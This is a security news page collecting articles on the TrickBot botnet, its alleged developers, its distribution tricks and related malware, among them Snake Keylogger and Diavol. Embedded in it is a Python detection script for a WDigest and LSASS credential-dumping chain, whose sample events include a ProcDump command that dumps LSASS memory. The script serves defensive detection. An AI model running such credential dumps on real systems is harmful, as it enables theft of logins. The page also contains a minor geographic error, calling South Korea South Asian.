Russian accused of developing programs for the Trickbot hacker network extradited from South Korea to US

 The US Department of Justice said that the Russian is a member of a hacker group that used the Trickbot malicious network. The network has been used to attack "millions of computers" around the world, including schools, banks, healthcare, energy and agricultural companies, the prosecution said.

According to the ministry's press release, 38-year-old Vladimir Dunaev and his accomplices stole money and confidential information from November 2015 until August 2020, and also damaged computer systems. Individuals, financial and state institutions, utilities and private enterprises are among the victims of the hackers' actions.

The US Department of Justice clarifies that Mr. Dunaev was allegedly one of the developers of malware for the Trickbot network. He was engaged in creating modifications for the browser and helped malicious software bypass security programs.

The Russian was extradited from South Korea to the United States last week, on October 20. He is charged with conspiracy to commit computer fraud and identity theft, conspiracy to commit information technology and banking fraud, and conspiracy to launder money. In total, more than 10 people are involved in the case, including four Russians and one Ukrainian.

In June, similar charges were brought against a citizen of Latvia, Anna Witte, whom the US Justice Department also considers a member of the hacker group that used Trickbot. This network, according to the American side, was located in Russia, Ukraine, Belarus and the Republic of Suriname (South America). The Washington Post wrote that Trickbot is allegedly controlled by Russian-speaking attackers. In November 2020, the network was disconnected; the American company Microsoft took part in the special operation.

Trickbot Uses New Distribution Mechanisms to Disseminate Malware

 

The creators of the harmful TrickBot malware have emerged with new tricks aimed at widening the malware's dissemination routes, ultimately culminating in the deployment of ransomware like Conti. According to a report by IBM X-Force, the threat actor known as ITG23 and Wizard Spider has been found collaborating with other cybercrime gangs known as Hive0105, Hive0106 (aka TA551 or Shathak), and Hive0107, adding to a growing number of campaigns that the attackers are relying on to deliver proprietary malware. 

TrickBot is a well-known banking Trojan that has been operating since October 2016, and its creators have kept it updated by adding new features. The botnet is still available via a multi-purpose malware-as-a-service (MaaS) model. Threat actors use the botnet to spread malware like Conti and Ryuk, which steal personal information and encrypt it. More than a million computers have been compromised by the Trickbot botnet so far. 

"These and other cybercrime vendors are infecting corporate networks with malware by hijacking email threads, using fake customer response forms and social engineering employees with a fake call center known as BazarCall," researchers Ole Villadsen and Charlotte Hammond said. 

Microsoft's Defender team, FS-ISAC, ESET, Lumen's Black Lotus Labs, NTT, and Broadcom's cyber-security division Symantec joined forces in October to launch a concerted effort to shut down the infamous TrickBot botnet's command and control infrastructure. Although Microsoft and its allies pulled the TrickBot infrastructure down, its operators sought to restart operations by bringing new command and control (C&C) servers online. 

In a malware campaign aimed at corporate users earlier this year, the cybercrime group used email campaigns to send Excel documents and a call center ruse known as "BazaCall." The gang formed a collaboration with two notable cybercrime affiliates in June 2021, which included the use of hijacked email threads and bogus website consumer inquiry forms.

"This move not only increased the volume of its delivery attempts but also diversified delivery methods with the goal of infecting more potential victims than ever," the researchers said. 

The Hive0107 affiliate is said to have adopted a new tactic in one infection chain observed by IBM in late August 2021, which involves sending email messages to target companies informing them that their websites have been performing distributed denial-of-service (DDoS) attacks on its servers, and urging the recipients to click on a link for more evidence. When the link is clicked, a ZIP archive containing a malicious JavaScript (JS) downloader is downloaded, which then contacts a remote URL to download the BazarLoader malware, which drops Cobalt Strike and TrickBot.

Alleged TrickBot Gang Member Arrested While Leaving South Korea




A Russian native – on accusations of being associated with the TrickBot cybercrime gang – was recently arrested by the authorities at Seoul International airport, while trying to leave South Korea. 

Reportedly, the Russian resident – identified as Mr. A by media –  was leaving for his home in Russia after waiting for over a year in the South Asian country. As per local media reports (Seoul's KBS) the alleged individual was prevented from leaving South Korea due to COVID-19 travel restrictions – international travel had been canceled by Seoul officials as the global pandemic broke out. Subsequently, Mr. A's passport expired, and he was stranded in South Korea as he waited to renew his passport. 

The Russian man, who allegedly worked as a web browser developer for the malware-spreading TrickBot gang in 2016 during his stay in Russia, denied 'being aware' of working for a cybercrime group. “When developing the software, the user manual did not identify malware,” said the individual at Seoul High Court. 

As per a Korean newspaper, on September 01, an interrogation was held at the 20th Criminal Division of the Seoul High Court – for the extradition request case against the alleged developer of the malware. While fighting the US extradition attempt, the lawyer of the accused argued that the US will prosecute the man unjustly. "If you send it to the United States, it will be very difficult to exercise your right of defense and there is a good chance that you will be subject to excessive penalties,” claimed the attorney. 

As per the reports, the suspect continued to maintain that the operation manual did not fall under malicious software when he developed the software. He received work from TrickBot via a job search site, following which he developed a web browser for the gang, according to The Record. Notably, the recruiters preferred applicants who did not ask a lot of questions. 

TrickBot is an advanced banking trojan that targets Windows machines. Initially created to steal the banking information of unsuspecting users, TrickBot has evolved over the last five years to be versatile, widely available, and easy to use. With new variants being increasingly released, TrickBot infections have become more frequent on home office networks; continuous advancement since its inception has cemented TrickBot's reputation as a highly adaptive modular malware.

TrickBot Employs Bogus 1Password Installer to Launch Cobalt Strike

 

The AV-TEST Institute records around 450,000 new malicious programs (malware) every day, along with several potentially unwanted applications (PUA). These are thoroughly examined by its team against characteristic parameters and classified accordingly. 

Malware is a file or piece of code, typically delivered over a network, that infects, scans, exploits, or performs practically any activity that an attacker desires. 

One such prevalent malware is Trickbot which was first seen in 2016. Trickbot has established itself in cyberspace as a modular and multipurpose malware. The Trickbot operators initially focused on bank credential theft operations and then expanded their skills to attack several industries. With further advancements Trickbot came to light for its participation in ransomware attacks, using Ryuk and Conti malware. 

Recently, it has been found that Trickbot employs a technique for installing a bogus "1Password password manager" to corrupt and collect data on the victim's PC. The first way to accomplish this is with a password-protected Microsoft Word or Excel archive file with macros that will compromise the targeted device if activated. To let the criminals gather information about several network computers, a bogus 1Password installer file with the title "Setup1.exe" is also commonly used to launch Cobalt Strike. 

1Password is a password manager developed by AgileBits Inc. It offers users a virtual vault, secured with a PBKDF2-protected master password, to hold several passwords, software licenses, and additional confidential material. 

In this regard, the DFIR Report states, “The Trickbot payload injected itself into the system process wermgr.exe — the Windows process responsible for error reporting. The threat actor then utilized built-in Windows utilities such as net.exe, ipconfig.exe, and nltest.exe for performing internal reconnaissance. Within two minutes of the discovery activity, WDigest authentication was enabled (disabled by default in Windows 10) in the registry on the infected host. This enforces credential information to be saved in clear text in memory. Shortly after applying this registry modification, the LSASS process was dumped to disk using the Sysinternals tool ProcDump.” 

This same bogus installer also drops a file that enables the execution of the Cobalt Strike (CS) shellcode and hence receives CS beacons. As the program allows unauthorized connections to victim systems, PowerShell commands are used to gather data about victim PCs, such as their “anti-virus state”. 

Cobalt Strike is a commercial penetration-testing framework that lets an attacker deploy an agent called 'Beacon' on the victim's network. Beacon has a wide range of functions including command execution, keylogging, data transfer, SOCKS proxying, privilege escalation, port scanning, and lateral movement. 

Meanwhile, as the researchers highlighted, the acquired material was not exfiltrated and the group's motives remain uncertain. If more developments are noted in the near future, they will continue to provide updates, said the researchers. 

Consequently, researchers in cybersecurity must look for approaches to make sure that their customer facilities are secure from these techniques, as the gang can restart an attack on other networks anytime.
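The sequence quoted from the DFIR Report above (reconnaissance tools spawned by wermgr.exe, WDigest enabled in the registry, then LSASS dumped with ProcDump) lends itself to a per-host correlation rule. The following is an added example, not code from the DFIR Report or this blog; the event field names, the 30-minute window and the sample events are constructed assumptions, and `UseLogonCredential` is the standard WDigest registry value rather than something quoted on this page.

```python
from datetime import datetime, timedelta

RECON_TOOLS = {"net.exe", "ipconfig.exe", "nltest.exe"}
DUMPERS = {"procdump.exe", "procdump64.exe"}
WDIGEST = r"\control\securityproviders\wdigest\uselogoncredential"
WINDOW = timedelta(minutes=30)  # assumed correlation window, tune per environment

# Constructed sample telemetry (field names are illustrative, not a real schema).
EVENTS = [
    {"ts": "2021-08-01T10:00:05", "host": "WS01", "type": "process",
     "parent": r"C:\Windows\System32\wermgr.exe",
     "image": r"C:\Windows\System32\nltest.exe", "cmdline": "nltest /domain_trusts"},
    {"ts": "2021-08-01T10:01:40", "host": "WS01", "type": "registry",
     "key": r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential",
     "value": 1},
    {"ts": "2021-08-01T10:03:10", "host": "WS01", "type": "process",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\Public\procdump64.exe", "cmdline": "procdump64.exe -ma lsass.exe out.dmp"},
    # Benign admin activity: recon tool from a shell, ProcDump on another process.
    {"ts": "2021-08-01T11:00:00", "host": "WS02", "type": "process",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\ipconfig.exe", "cmdline": "ipconfig /all"},
    {"ts": "2021-08-01T11:05:00", "host": "WS02", "type": "process",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Tools\procdump.exe", "cmdline": "procdump.exe -ma w3wp.exe"},
    # WDigest re-enabled with no dump seen yet: still worth a look.
    {"ts": "2021-08-01T12:00:00", "host": "WS03", "type": "registry",
     "key": r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential",
     "value": 1},
]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Map one event to a stage of the described chain, or None."""
    if ev["type"] == "process":
        image, parent = basename(ev["image"]), basename(ev.get("parent", ""))
        # wermgr.exe (error reporting) has no reason to spawn network recon tools.
        if parent == "wermgr.exe" and image in RECON_TOOLS:
            return "recon_from_wermgr"
        # String match only: a dump requested by PID needs process-access telemetry.
        if image in DUMPERS and "lsass" in ev.get("cmdline", "").lower():
            return "lsass_dump"
    elif ev["type"] == "registry":
        if ev["key"].lower().endswith(WDIGEST) and ev.get("value") == 1:
            return "wdigest_enabled"
    return None

def detect(events, window=WINDOW):
    """Correlate stages per host; WDigest followed by an LSASS dump escalates."""
    per_host = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        stage = classify(ev)
        if stage:
            hit = (datetime.fromisoformat(ev["ts"]), stage)
            per_host.setdefault(ev["host"], []).append(hit)
    alerts = []
    for host, hits in sorted(per_host.items()):
        stages = {s for _, s in hits}
        enabled = [t for t, s in hits if s == "wdigest_enabled"]
        dumps = [t for t, s in hits if s == "lsass_dump"]
        chained = any(timedelta(0) <= d - w <= window for w in enabled for d in dumps)
        if chained:
            severity = "critical" if "recon_from_wermgr" in stages else "high"
        elif stages & {"wdigest_enabled", "lsass_dump"}:
            severity = "medium"
        else:
            severity = "low"
        alerts.append({"host": host, "severity": severity, "stages": sorted(stages)})
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```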

Snake Keylogger: Enters Top 10 List for the Most Prominent Malwares

 

Check Point Research reveals that for three straight months Trickbot has been by far the most common malware, whereas, for the very first time, Snake Keylogger is the second most prevalent malware.
 
Snake Keylogger, first spotted in November 2020, is a modular .NET keylogger and credential stealer. It has advanced to the position of second-most frequent malware variant in the world and has become increasingly popular in recent weeks, as per Check Point's Global Threat Index for July 2021. 

The main function of the malware is to capture the keystrokes of users on computers or mobile devices and then to pass the collected information to the cyber thieves and hackers behind the rogue software. 

Infections with Snake Keylogger are a huge threat to any user's data privacy and internet security because spyware can steal nearly everything. It is also usually considered to be an especially deceptive and persistent keylogger. After a spate of effective phishing attacks, Snake Keylogger has become extremely prevalent. The malware is currently purchasable at a variety of underground sites, with purchasers being able to buy the malware for only $25. 

Check Point researchers have shown that Snake Keylogger attacks are typically very efficient because of the human tendency to use the same password and username on many accounts. As a result, once one login credential is compromised, malicious hackers get access to all accounts using the same password. 

Maya Horowitz, VP of Check Point Research, recommended that users must employ a "unique option" for each of the many profiles to stop such cyberattacks. “When it comes to password policies, choosing a strong, unique password for each service is the best advice, then even if the bad guys do get hold of one of your passwords, it won’t immediately grant them access to multiple sites and services,” she further explained. 

“Where possible, users should reduce the reliance on passwords alone, for example by implementing Multi-Factor Authentication (MFA) or Single-Sign-On (SSO) technologies,” Horowitz added. Keeping vigilance whenever visiting the web or checking emails is highly encouraged by Horowitz. 

As 'Keyloggers' are frequently spread through phishing emails, users must be aware of subtle anomalies, such as errors in URLs and email addresses. They must avoid clicking on malicious links or downloading any unusual attachments. 

Check Point Research also identified some of the world's leading malware families and provided information on rising mobile malware activity. It affirms that Trickbot is the world's most prevalent malware, with an impact of 4%, trailed by Snake Keylogger and XMRig, each with worldwide impacts of 3%. Trickbot is an ongoing modular Botnet and Banking Trojan with new functions, features, and vectors for propagation. Meanwhile, XMRig, which was first seen in the wild in May 2017, is an open-source CPU mining program that is used for Monero cryptocurrency mining. 

Throughout the month of July, xHelper was recognized as one of the most widespread mobile viruses in the world, followed by AlienBot and Hiddad. Studies indicate that xHelper has been around since March 2019. Whereas, Hiddad is an Android trojan that repackages and delivers legitimate programs to a third-party store. The primary purpose of the malware is to show advertisements. 


TrickBot Makes a Comeback with a VNC Module

 

Cybersecurity researchers have revealed the ongoing revival of the malicious TrickBot malware, showing that the Russia-based transnational cybercriminal group is now working behind the scenes to upgrade its attack infrastructure in reaction to the recent countermeasures by police forces. 

The newly uncovered capabilities are used to monitor and collect intelligence on victims through a unique communication protocol that hides data exchanges between command-and-control servers and victims, making attacks hard to identify. TrickBot also shows no sign of slowing down. 

Botnets are created by placing hundreds or thousands of hijacked devices on a network managed by criminal operators, and are usually used to flood companies and key infrastructure with illegitimate traffic in denial-of-network attacks. However, malevolent actors with control over these devices may also employ botnets to disseminate malware and spam or to carry out ransomware file encryption on compromised computers. 

TrickBot is no different. The well-known cybercrime gang, known as Wizard Spider, has a track record of using infected machines to steal confidential information, pivot across a network, and even load other malware, like ransomware, while constantly improving its infection chains by adding modules that offer new functionality to enhance their efficiency. 

"TrickBot has evolved to use a complex infrastructure that compromises third-party servers and uses them to host malware," Lumen's Black Lotus Labs disclosed last October. "It also infects consumer appliances such as DSL routers, and its criminal operators constantly rotate their IP addresses and infected hosts to make disruption of their crime as difficult as possible."

As per Bitdefender, the threat actor has now been found actively building an updated version of the "vncDll" module, which it uses against selected high-profile targets for surveillance and intelligence gathering. The new version has been named "tvncDll". 

The botnet has managed to survive two takedown efforts by Microsoft and the United States Cyber Command, and its operators have been developing firmware intrusion components that enable hackers to plant backdoors in the Unified Extensible Firmware Interface (UEFI), allowing the malware to survive anti-virus detection, software updates, or even a complete wipe and reinstallation of the computer's operating system. 

The new module is meant to interact with one of nine command-and-control (C2) servers identified in its configuration file, using that server to receive commands, download further malware payloads, and exfiltrate information from the infected machine. 

Further, the researchers indicate that they have uncovered a "viewer tool" that attackers use to connect to victims through the C2 servers.

Diavol Ransomware is Linked to Wizard Spider Cybercrime Group

 

The cybercrime group behind the Trickbot botnet, Wizard Spider, has been linked to a new ransomware strain dubbed Diavol, according to FortiGuard Labs security analysts. In early June 2021, Diavol and Conti ransomware payloads were delivered on several systems in a ransomware attack prevented by the company's EDR technology. 

Wizard Spider is a financially motivated criminal group based in Russia that manages the Trickbot botnet, which is used to distribute second-stage malware to infected devices and networks. Because it spreads over corporate networks, Trickbot is especially hazardous to companies. If it gains administrative access to a domain controller, it will also steal the Active Directory database, allowing the group to harvest even more network credentials.

From the use of asynchronous I/O operations for file encryption queuing to the use of nearly identical command-line options for the same functionality (i.e., logging, drives and network shares encryption, network scanning), the two ransomware groups' samples are cut from the same cloth. Despite the similarities, the researchers were unable to establish a clear relationship between Diavol ransomware and the Trickbot gang, due to some substantial differences that made attribution with high confidence impossible. For example, unlike Conti, Diavol ransomware has no built-in checks to prevent payloads from operating on Russian targets' systems. There's also no proof of data exfiltration capabilities before encryption, which is a classic ransomware extortion method. 

The encryption mechanism used by Diavol ransomware is based on user-mode Asynchronous Procedure Calls (APCs) and an asymmetric encryption algorithm. This distinguishes it from other ransomware families, which frequently employ symmetric methods to accelerate the encryption process. Diavol doesn't employ any obfuscation techniques, such as packing or anti-disassembly, but it nonetheless manages to obfuscate its essential routines by putting them in bitmap images.

When the ransomware executes on a compromised PC, it extracts the code from the images in the PE resource section and loads it into a buffer with execution permissions. Before the Diavol ransomware finishes, it changes the background of each encrypted Windows device to a black wallpaper with the following message: "All your files are encrypted! For more information see README-FOR-DECRYPT.txt."

"Currently, the source of the intrusion is unknown," Fortinet says. "The parameters used by the attackers, along with the errors in the hardcoded configuration, hint to the fact that Diavol is a new tool in the arsenal of its operators which they are not yet fully accustomed to."